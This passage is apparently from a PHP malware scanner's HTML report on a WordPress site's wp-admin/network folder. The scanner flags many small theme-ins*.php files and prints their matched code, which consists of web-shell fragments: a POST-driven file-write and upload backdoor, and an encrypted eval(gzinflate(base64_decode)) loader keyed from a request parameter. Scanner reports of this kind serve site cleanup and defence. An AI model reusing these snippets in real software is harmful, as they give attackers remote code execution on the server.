</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">VqBQv</span><span style="color: #007700">(</span><span style="color: #0000BB">$NgBe</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ZKSls </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$xqrI </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZKSls</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$cxU </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$NgBe</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$cxU</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$ZKSls</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$xqrI</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">VqBQv</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'skVh3/PevsnklyhNy6aTZm0W/34V4e</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VqBQv</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VqBQv</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_148").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insrxfo.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 344.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_149" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_149").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insplbx.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 341.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_150" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_150").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insublv.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:41:30</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_151" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_151").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-inspugf.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 341.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_152" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_152").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-inspzwj.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 341.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_153" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_153").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-inscvkj.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_154" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_154").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insbidl.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_155" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_155").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-inscilf.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_156" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_156").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insrpkq.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_157" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
